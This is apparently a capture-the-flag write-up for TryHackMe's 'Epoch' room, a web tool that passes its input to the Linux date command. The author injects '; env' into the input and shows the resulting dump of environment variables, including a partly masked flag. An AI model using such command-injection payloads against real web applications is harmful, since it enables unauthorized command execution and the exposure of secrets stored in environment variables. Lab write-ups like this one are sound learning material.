What is Epoch? While researching i found that epoch is a unix timestamp using seconds to to measure dates, here is more about Unix Epoch >>>
Challenge Description
Be honest, you have always wanted an online tool that could help you convert UNIX dates and timestamps! Wait… it doesn’t need to be online, you say? Are you telling me there is a command-line Linux program that can already do the same thing? Well, of course, we already knew that! Our website actually just passes your input right along to that command-line program!
Access this challenge by deploying both the vulnerable machine by pressing the green “Start Machine” button located within this task, and the TryHackMe AttackBox by pressing the “Start AttackBox” button located at the top-right of the page.
Navigate to the following URL using the AttackBox: http://10.10.15.160
Check out similar content on TryHackMe:
Trying Command Injection
so this is basically falls under verbose command injection as i learned in the room Command Injection, so shud be easy to exploit.
HINT : The developer likes to store data in environment variables, can you find anything of interest there?
they have provided the above hint for us
so i tried to add payload ; env and it worked
Sun Sep 9 01:46:40 UTC 2001
HOSTNAME=e7c1352e71ec
PWD=/home/challenge
HOME=/home/challenge
GOLANG_VERSION=1.15.7
FLAG=flag{7da6c7debd40bd611560c13******}
SHLVL=1
PATH=/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env